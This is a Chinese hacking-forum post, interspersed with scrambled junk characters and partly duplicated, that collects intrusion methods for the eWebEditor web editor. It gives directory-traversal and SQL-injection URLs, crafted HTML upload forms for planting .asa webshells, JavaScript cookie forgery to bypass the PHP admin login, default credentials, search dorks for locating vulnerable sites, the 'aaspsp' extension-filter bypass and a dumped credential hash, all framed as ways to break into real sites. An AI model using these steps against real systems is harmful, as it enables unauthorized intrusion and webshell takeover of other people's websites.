eWebEditor.asp?id=45&style=standard1 样式调用
! P0 P. x% ]4 A
# ~4 B: m9 Y6 P& F; {8 ]4 G7 ~/ m' {, T$ Q8 H0 z- G) J; w( h: ~: b
/edit/admin_uploadfile.asp?id=14&dir=../../..
$ e5 r* z. c+ T) n可以浏览网站目录 ../自己加或者减7 f6 W- y3 j. w4 g
7 G( ^$ j) e7 d有次无意的入侵使我发现了ewebeditor2.7.0版本的存在注入漏洞5 e0 Q' n) ` Q/ v: i
简单利用就是
: v7 r8 i" G9 ~http://site/path/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200
. ]1 s8 Q. z; vhttp://www.siqinci.com/ewebedito ... amp;style=full_v200
! l& X$ s2 y. X% o0 I% e3 c可以利用nbsi进行猜解,对此进行注入
( T. A/ C7 v3 {( z$ U: k- T" r还有的时候管理员不让复制样式,但是你又看到有个样式被别人以前入侵修改了存在asa或者之类可以传shell,但是上传插入工具没有,又无法修改怎么办那?也许很多人说应该可以加工具栏,但是我就遇见过不让加的
; [& a* z' t- G这样我们可以利用ewebeditor里的upload.asp文件进行本地构造进行上传具体如下:
7 [; Y* T, B+ C! X在action下面
) t7 A: ]: B. D6 N |<form action="http://*********/edit/upload.asp?action=save&type=ASA&style=test" method=post name=myform enctype="multipart/form-data">
% I5 h$ m D3 v3 g3 `9 [<input type=file name=uploadfile size=1 style="width:100%" onchange="originalfile.value=this.value">
3 w8 k( ^( ?* s$ X% Z. D8 O<input type="submit" name="uploadfile" value="提交">
0 W) H1 N2 d' [2 W/ i& F0 s<input type=hidden name=originalfile value="">
6 i8 ^9 J6 H. ?( t: q</form>
1 j: r# K1 s2 @9 W# G------------------------------------------------------------------------------------------------------------------------------------------------
! g7 j5 c6 j3 d+ \: c2 g% ~<input type="submit" name="uploadfile" value="提交"> 放在action后头8 g* K+ o$ L. {% Z# x Z' {
,适合用于在ewebeditor后台那个预览那里出来的 比如上传图片那里,有些时候上传页面弹不出来,就可以用upload.asp?action=save&type=ASA&style=test 这个本地来提交,不过这个东西还是要数据库里上传类型有ASA才可以传得上。
9 e& F5 f# L6 K; h. A# O$ ~
. }" R2 r) }. {' `$ V5 A/ F0 |2 ^' h
3 V) Y) y/ X& y5 @$ n! R
7 i- A2 A- Q: g2 r1 k8 W
Ewebeditor最新漏洞及漏洞大全[收集] (图)
! B9 }4 Z7 g% B4 h% k3 [6 L本帖最后由 administrator 于 2009-7-7 21:24 编辑$ [5 W g X4 Z+ n
( s# j4 i) e8 K9 i; j' G' Q
以下文章收集转载于网络/ o' t p$ u* L I: s
#主题描述# ewebeditor 3.8漏洞[php]) Y) Z9 p8 l% y ^9 S. r4 Y
--------------------------------------------------------------------------------------------
}! z w1 z. q8 s#内容#: C4 g: u4 C6 }1 {3 ^; Y7 F
php版ewebeditor 3.8的漏洞4 t+ o2 R+ z: c5 h8 O7 l1 q
php版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道,在这里我说说利用方法:
9 P# M: j* L; J# O- j5 w h. Z/ o# L1 首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了,必须是出错的时候,然后这时候你清空浏览器的url,然后输入 javascript:alert(document.cookie=”adminuser=”+escape(”admin”)); javascript:alert(document.cookie=”adminpass=”+escape(”admin”)); javascript:alert(document.cookie=”admindj=”+escape(”1″));后三次回车,
C) @* Z S( I' \; K2 Q/ O* [2 然后输入正常情况才能访问的文件../ewebeditor/admin/default.php就可以进后台了
( O( e7 d [; I+ W5 L3 后面的利用和asp一样,新增样式修改上传,就ok了- c, R# g1 P* Y, H3 a( K- ]
测试一下asp 2.8版本的,竟然一样可以用,爽,看来asp版的应该可以通杀(只测试2.8的,貌似2.8是最高版本的)$ M$ p6 `8 E5 ?
aspx的版本../ewebeditor/admin/upload.aspx添好本地的cer的Shell文件,在浏揽器输入javascript:lbtnUpload.click();就能得到shell
( |6 ], R. x6 }, M& U) Ajsp的上传漏洞以及那个出了N久了,由于没有上传按钮,选择好要上传的shell,直接回车就可以了% m; O: w0 j, G2 ^
--------------------------------------------------------------------------------------------/ M" w- l3 p( G2 o L4 F, x
" w9 d$ V1 X4 c5 c2 t5 _% T B& K
8 J8 b# C; @# D7 l7 U6 y算是比较全面的ewebeditor编辑器的漏洞收集,现在的网站大多数用的都是ewebeditor编辑器,所以ewebeditor漏洞的危害性还是相当大的,做了一下漏洞收集,漏洞修补的方法可去网上查找。
8 \- m! a+ J3 `# ]. J+ I, a
7 s' d* h1 O$ c& O P' z漏洞更新日期TM: 2009 2 9日 转自zake’S Blog5 h8 K+ ?* Q& i$ c
ewebeditor最新漏洞。这个程序爆漏洞一般都是直接上传的漏洞,首先在本地搭建一个ASP环境重命名一个木马名字例如:1.gif.asp这样的就OK了: d" p) h* T5 ]2 s+ C |" Y' N2 v
那么接下来完美本地搭建一个环境你可以用WEB小工具搭建一个,目的就是让远程上传。/pic/3/a2009-6-4-7341a1.gif.asp搭建好了 ,在官方的地方执行网络地址
1 [& a8 M: N% Z$ ^5 ~, ?- ^/ ]* j$ D" ?6 x3 V% s9 P. G
1 _4 w5 j: h$ @6 |. O/ `$ b$ U9 U" Q
然后确定以后,这里是最关键的一部!# f: z# O# t# @. j
这里点了远程上传以后,再提交得到木马地址7 c1 h+ ^7 p3 k: H5 f' ~. P* u3 |
由于官方在图片目录做了限制 导致不能执行ASP脚本而没能拿到WEB权限7 r5 X4 y: v- C
属于安全检测漏洞版本ewebeditor v6.0.0( w7 e; T& Q# [
- y( w/ ]8 b7 x5 y2 j以前的ewebeditor漏洞:0 h* Q8 R; [* K- a
; A' d4 L- } ^" K& K+ F5 ]/ v! Gewebeditor注入漏洞/ V3 L( ?# \' `$ ]) s1 ?
4 E9 j" K8 M. k. A" B$ D
大家都知道ewebeditor编辑器默认的数据库路径db/ewebeditor.mdb
! \. h0 V4 ~3 ~- x默认后台地址是admin_login.asp,另外存在遍历目录漏洞,如果是asp后缀的数据库还可以写入一句话! h9 c6 W, o& w- Z, V# Y, E; `* a
今天我给大家带来的也是ewebeditor编辑器的入侵方法
# W8 f# }6 H% Z# z$ @ F7 Z0 L; ]不过一种是注入,一种是利用upload.asp文件,本地构造
* [7 p$ M( l( n7 V: R/ tNO1:注入
5 V/ X" D. n1 Uhttp://www.XXX.com/ewebeditor200 ... amp;style=full_v200' k0 ]! W3 @2 `3 `! H
编辑器ewebedior7以前版本通通存在注入
1 Z% A8 m: x3 Q9 m3 T+ H直接检测不行的,要写入特征字符
/ H% \+ b" i3 I8 f- `/ f+ L我们的工具是不知道ewebeditor的表名的还有列名
1 ]4 M; |" L) y8 W我们自己去看看
9 r0 o8 L3 t1 C1 f' n# R+ m( |哎。。先表吧
& K* |% K4 R/ ~; U8 c要先添加进库
( h- O2 Y5 j, V开始猜账号密码了
" w- C( J" G- [& ?! x3 c0 A X我们==
; k3 V$ o1 a/ L心急的往后拉
9 H, d) o+ {' K8 j5 V8 ?出来了
& o& V- `2 z8 v) b6 V6 L[sys_username]:bfb18022a99849f5 chaoup[sys_userpass]:0ed08394302f7d5d 8511203 @) N0 n; H$ c* t3 w1 k9 K8 p
对吧^_^
# M) ~7 C& E9 s+ o+ c( B. |1 {$ P后面不说了# v T# }' J8 {0 F/ v
NO2:利用upload.asp文件,本地构造上传shell7 H9 y0 D+ V; T$ P& A. V4 e
大家看这里
: A3 n- x4 q% ~1 nhttp://www.siqinci.com/ewebedito ... lepreview&id=371 t% f3 v( r" q$ J* T: f5 q$ i
如果遇见这样的情况又无法添加工具栏是不是很郁闷8 R& i8 c% }. u2 f0 f( p& @* ~
现在不郁闷了,^_^源源不一般2 R: u3 W" B' r4 T$ s: [$ E) n( I
我们记录下他的样式名“aaa”
; i# B( O. `+ z我已经吧upload.asp文件拿出来了
% D6 F4 }) n& K, c! _' q! G Z我们构造下
. b' h% X, |) ~! WOK,我之前已经构造好了1 R" O/ l1 w/ D! ?3 T
其实就是这里
8 D' F+ _7 R5 H1 @2 `8 E<form action=”地址/path/upload.asp?action=save&type=&style=样式名” method=post name=myform enctype=”multipart/form-data”>) {/ k# |0 b. y" h5 F" w
<input type=file name=uploadfile size=1 style=”width:100%”>; I3 C* u) [, ?3 C6 z
<input type=submit value=”上传了”></input>
6 O/ Q% [% t2 [8 K, @</form>6 x8 ^- q8 m8 D" |) {3 k
下面我们运行他上传个大马算了
: r0 d9 K2 R) l- d5 AUploadFile上传进去的在这个目录下# r0 B' x/ V; \: m$ u* o( {
2008102018020762.asa' s- b) X& E) S2 n! L0 K* ]
! ~' F/ G/ Y# D8 `8 F. E过往漏洞: Q4 v) e8 W8 S; N T
9 i( j. F8 S) P5 }) m; _; j% _ t2 O
首先介绍编辑器的一些默认特征:
) J. r4 n! D8 M, I- m默认登陆admin_login.asp) b* q9 B! S) `9 p# B: v
默认数据库db/ewebeditor.mdb1 w+ D- Z8 c: ^
默认帐号admin 密码admin或admin888* Q) R1 t# o, s6 Z# g
搜索关键字:”inurl:ewebeditor” 关键字十分重要" I% {$ m- A2 V
有人搜索”eWebEditor - eWebSoft在线编辑器”
) e: Z {2 _+ u N% I+ e根本搜索不到几个~5 ` \7 V7 i% _3 H/ R6 x
baidu.google搜索inurl:ewebeditor3 n2 q1 @6 D- Q) N5 Y4 ?. `1 Q7 k
几万的站起码有几千个是具有默认特征的~( K0 |3 a9 d: D; V9 {
那么试一下默认后台' @' X" a! H5 \( ]; f2 ]( T
http://www.xxx.com.cn/admin/ewebeditor/admin_login.asp
1 `+ Y4 F" E" [试默认帐号密码登陆。. a' {( O2 D& }5 T1 q
利用eWebEditor获得WebShell的步骤大致如下:/ P$ A$ A! @/ Y* e" s8 G
1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。
( Y7 M4 S: K# n5 m! o2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID=’eWebEditor1′ src=’/edit/ewebeditor.asp?id=content&style=web’ frameborder=0 scrolling=no width=’550′ HEIGHT=’350′></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了 eWebEditor。然后记下src=’***’中的“***”,这就是eWebEditor路径。% K- C$ F1 Z, Z
3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。
]) ~" x1 Z% T0 B! [' }4 l, j- L如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)!
3 R5 X9 I# ^, `" ?; t6 g$ u4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。, L' p1 ^" w8 Y! K( w& [- o8 r4 h
然后在上传的文件类型中增加“asa”类型。
0 O3 F9 i1 f4 d X' e" M9 f5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。
3 C" f8 S) N& {漏洞原理8 [" p* I/ T: X" O# n% a
漏洞的利用原理很简单,请看Upload.asp文件:
" v7 s, ?1 q! y( b( ~$ r# o1 O任何情况下都不允许上传asp脚本文件( n" j9 A- N; R2 H3 n# n; _
sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)
[) G4 h$ p7 F- p, t因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!
6 |) J0 C/ f/ M9 H高级应用+ I" E9 d, @! O9 l' N0 o
eWebEditor的漏洞利用还有一些技巧:
p6 w0 O# Q; g( X1.使用默认用户名和密码无法登录。
$ t% X u" ]4 r( ]) d7 ]# R请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法破解,那就当自己的运气不好了。
% N$ x9 P; f8 X2.加了asa类型后发现还是无法上传。% I+ }4 v. J. e3 u4 J
应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)一句上修改,我就看见过一个站长是这样修改的:' W9 ]6 A& y- M+ J/ Q; @' j
sAllowExt = Replace(Replace(Replace(Replace(Replace(UCase(sAllowExt), “ASP”, “”), “CER”, “”), “ASA”, “”), “CDX”, “”), “HTR”, “”)
- D% T8 l( Q( B; a/ J# K9 J1 T& F猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了 “asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。
& X& A* i- F' h! l4 v: l2 i3.上传了asp文件后,却发现该目录没有运行脚本的权限。
' g, x5 [8 } W" o0 n, C% @呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。2 W" }& T( K" \0 g# l! B/ u
4.已经使用了第2点中的方法,但是asp类型还是无法上传。; w8 K' a# S' }$ G
看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的 “asp”删除。
# O9 T7 U2 h% z* {后记3 _9 v. G: Q2 K; d/ l4 A2 g
根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索 “ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上!
, K5 U' l, y0 l3 r' [( q基本入侵基础漏洞/ w! l& N. C/ C- ~/ e( k: P
eWebEditor 漏洞
$ ]9 L5 O# l- @" r3 b9 @; D
( v- }% A2 ]8 T% A2 _" Q各位站长在使用eWebEditor的时候是否发现,eWebEditor配置不当会使其成为网站中的隐形炸弹呢?第一次发现这漏洞源于去年的一次入侵,在山穷水尽的时候发现了eWebEditor,于是很简单就获得了WebShell。后来又有好几次利用eWebEditor进行入侵的成功经历,这才想起应该写一篇文章和大家共享一下,同时也请广大已经使用了eWebEditor的站长赶紧检查一下自己的站点。要不然,下一个被黑的就是你哦!
0 s. y: ~# K4 |
! |& v0 o3 a1 k8 {% x T: M漏洞利用
; C8 }% y$ k# |/ q9 n利用eWebEditor获得WebShell的步骤大致如下:& v8 ]' g$ Q6 C. |0 G- c0 Y
1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。
& f L' w [& j* e K% U2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID='eWebEditor1' src='/edit/ewebeditor.asp?id=content&style=web' frameborder=0 scrolling=no width='550' HEIGHT='350'></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了 eWebEditor。然后记下src='***'中的“***”,这就是eWebEditor路径。, m$ v. W$ E1 F) x
3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。
! f" a5 P' x/ n5 z如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)!
. O5 U5 j6 M6 o2 G/ p# P4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。/ [0 h; ~+ C+ D3 u" l
1 Q% X& L3 R) @6 H然后在上传的文件类型中增加“asa”类型。
2 p3 H# H3 }" X$ Z! n' X& b6 y$ m' K' f& \- p1 O3 d6 X
5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。
8 n& _8 Y) M" o& R/ I: g
+ i! j% H Y {9 O( q: f( d0 W7 {+ d
漏洞原理
* s" V3 m7 o v' I! A漏洞的利用原理很简单,请看Upload.asp文件:0 ~6 U. Z4 @" f( r8 N, A
任何情况下都不允许上传asp脚本文件
' ~# W$ ]# a; R, dsAllowExt = replace(UCase(sAllowExt), "ASP", "")$ `: j1 ~/ ~: F$ q+ K. |# T
因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!, P Y. D9 r$ U* x7 o1 x8 G
1 h! ^6 X3 l: t) _
高级应用
9 i$ _" l- ^' TeWebEditor的漏洞利用还有一些技巧:* f8 S- N( z6 s2 i( t: d
1.使用默认用户名和密码无法登录。0 Q& S0 O+ q! `
请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法****,那就当自己的运气不好了。' z" t: O, Y/ a
2.加了asa类型后发现还是无法上传。
7 M9 b- V G x# [- Y& n应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = replace(UCase(sAllowExt), "ASP", "")一句上修改,我就看见过一个站长是这样修改的:% a1 U% i, A2 [7 z$ _, {5 P9 Z9 F
sAllowExt = replace(replace(replace(replace(replace(UCase(sAllowExt), "ASP", ""), "CER", ""), "ASA", ""), "CDX", ""), "HTR", ""); n( q4 k1 ~ O- ?/ _" v1 a+ q
猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了 “asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。
! p& w# J% S' E( e- Q! @3.上传了asp文件后,却发现该目录没有运行脚本的权限。% q7 J2 F* v) u- M) z5 m
呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。& L) j: ]/ |1 M- V* ?4 |$ x
4.已经使用了第2点中的方法,但是asp类型还是无法上传。" F; \* Q/ e, d O
看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的 “asp”删除。
0 s0 u" P4 {" z# {, P% v8 P) Q! U8 I, _4 f9 i
后记! Z f' c- R' W/ H
根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索 “ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上! |
发表于 2012-9-13 17:00:58
收藏
支持
反对